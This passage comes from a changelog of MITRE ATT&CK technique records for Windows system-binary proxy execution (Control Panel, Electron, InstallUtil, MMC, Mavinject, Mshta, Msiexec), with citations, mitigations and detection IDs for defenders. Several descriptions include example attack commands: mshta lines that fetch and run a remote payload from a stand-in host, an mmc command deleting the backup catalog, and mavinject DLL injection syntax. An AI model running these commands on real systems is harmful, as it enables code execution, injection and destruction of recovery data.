+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/002",
+                            "external_id": "T1218.002"
+                        },
+                        {
+                            "source_name": "TrendMicro CPL Malware Dec 2013",
+                            "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/"
+                        },
+                        {
+                            "source_name": "Palo Alto Reaver Nov 2017",
+                            "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+                        },
+                        {
+                            "source_name": "ESET InvisiMole June 2020",
+                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Implementing CPL",
+                            "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx"
+                        },
+                        {
+                            "source_name": "TrendMicro CPL Malware Jan 2014",
+                            "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.",
+                            "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2026-04-15 22:37:43.971000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0194: Detection of Malicious Control Panel Item Execution via control.exe or Rundll32"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-07 19:32:35.383000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Electron Applications",
+                    "description": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)\n\nDue to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c calc.exe`).(Citation: Electron 6-8)\n\nAdversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/015",
+                            "external_id": "T1218.015"
+                        },
+                        {
+                            "source_name": "Electron 3",
+                            "description": "Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024.",
+                            "url": "https://www.kaspersky.com/blog/electron-framework-security-issues/49035/"
+                        },
+                        {
+                            "source_name": "Electron Security",
+                            "description": "ElectronJS.org. (n.d.). Retrieved March 7, 2024.",
+                            "url": "https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules"
+                        },
+                        {
+                            "source_name": "Electron 6-8",
+                            "description": "Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024.",
+                            "url": "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf"
+                        },
+                        {
+                            "source_name": "Electron 1",
+                            "description": "TOM ABAI. (2023, August 10). There\u2019s a New Stealer Variant in Town, and It\u2019s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024.",
+                            "url": "https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/"
+                        },
+                        {
+                            "source_name": "Electron 2",
+                            "description": "Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024.",
+                            "url": "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Debabrata Sharma",
+                        "Uriel Kosayev"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-20 18:01:23.195000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1050: Exploit Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0025: Detecting Electron Application Abuse for Proxy Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 19:09:48.811000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "InstallUtil",
+                    "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/004",
+                            "external_id": "T1218.004"
+                        },
+                        {
+                            "source_name": "LOLBAS Installutil",
+                            "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/"
+                        },
+                        {
+                            "source_name": "MSDN InstallUtil",
+                            "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.",
+                            "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Casey Smith",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-15 22:39:41.457000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0138: Detection of Malicious Code Execution via InstallUtil.exe"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-09-28 01:36:41.638000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "MMC",
+                    "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, <code>mmc C:\\Users\\foo\\admintools.msc /a</code> will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation: abusing_com_reg)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/014",
+                            "external_id": "T1218.014"
+                        },
+                        {
+                            "source_name": "abusing_com_reg",
+                            "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.",
+                            "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"
+                        },
+                        {
+                            "source_name": "mmc_vulns",
+                            "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.",
+                            "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/"
+                        },
+                        {
+                            "source_name": "win_msc_files_overview",
+                            "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.",
+                            "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/"
+                        },
+                        {
+                            "source_name": "win_mmc",
+                            "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc"
+                        },
+                        {
+                            "source_name": "win_wbadmin_delete_catalog",
+                            "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog"
+                        },
+                        {
+                            "source_name": "win_clsid_key",
+                            "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm"
+                        },
+                        {
+                            "source_name": "what_is_mmc",
+                            "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console"
+                        },
+                        {
+                            "source_name": "phobos_virustotal",
+                            "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.",
+                            "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Wes Hurd"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 22:39:47.445000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0222: Detecting MMC (.msc) Proxy Execution and Malicious COM Activation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-09-22 17:45:10.241000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Mavinject",
+                    "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. <code>C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/013",
+                            "external_id": "T1218.013"
+                        },
+                        {
+                            "source_name": "ATT Lazarus TTP Evolution",
+                            "description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.",
+                            "url": "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution"
+                        },
+                        {
+                            "source_name": "LOLBAS Mavinject",
+                            "description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"
+                        },
+                        {
+                            "source_name": "Mavinject Functionality Deconstructed",
+                            "description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.",
+                            "url": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"
+                        },
+                        {
+                            "source_name": "Reaqta Mavinject",
+                            "description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.",
+                            "url": "https://reaqta.com/2017/12/mavinject-microsoft-injector/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-15 22:39:41.553000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0433: Detecting Code Injection via mavinject.exe (App-V Injector)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 19:32:49.557000+00:00",
+                    "modified": "2026-05-12 15:12:00.676000+00:00",
+                    "name": "Mshta",
+                    "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))</code>\n\nThey may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/005",
+                            "external_id": "T1218.005"
+                        },
+                        {
+                            "source_name": "FireEye Attacks Leveraging HTA",
+                            "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 April 2017",
+                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+                        },
+                        {
+                            "source_name": "Airbus Security Kovter Analysis",
+                            "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.",
+                            "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/"
+                        },
+                        {
+                            "source_name": "Cylance Dust Storm",
+                            "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.",
+                            "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
+                        },
+                        {
+                            "source_name": "LOLBAS Mshta",
+                            "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/"
+                        },
+                        {
+                            "source_name": "Red Canary HTA Abuse Part Deux",
+                            "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.",
+                            "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/"
+                        },
+                        {
+                            "source_name": "MSDN HTML Applications",
+                            "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.",
+                            "url": "https://msdn.microsoft.com/library/ms536471.aspx"
+                        },
+                        {
+                            "source_name": "Wikipedia HTML Application",
+                            "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/HTML_Application"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "@ionstorm",
+                        "Ricardo Dias",
+                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.676000+00:00\", \"old_value\": \"2026-04-15 22:40:01.325000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0506: Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-24 14:38:49.266000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Msiexec",
+                    "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/007",
+                            "external_id": "T1218.007"
+                        },
+                        {
+                            "source_name": "TrendMicro Msiexec Feb 2018",
+                            "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"
+                        },
+                        {
+                            "source_name": "LOLBAS Msiexec",
+                            "description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"
+                        },
+                        {
+                            "source_name": "Microsoft msiexec",
+                            "description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec"
+                        },
+                        {
+                            "source_name": "Microsoft AlwaysInstallElevated 2018",
+                            "description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alexandros Pappas",
+                        "Ziv Kaspersky, Cymptom"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2026-04-15 22:40:01.230000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0158: Detection of Msiexec Abuse for Local, Network, and DLL Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-24 15:01:32.917000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Odbcconf",
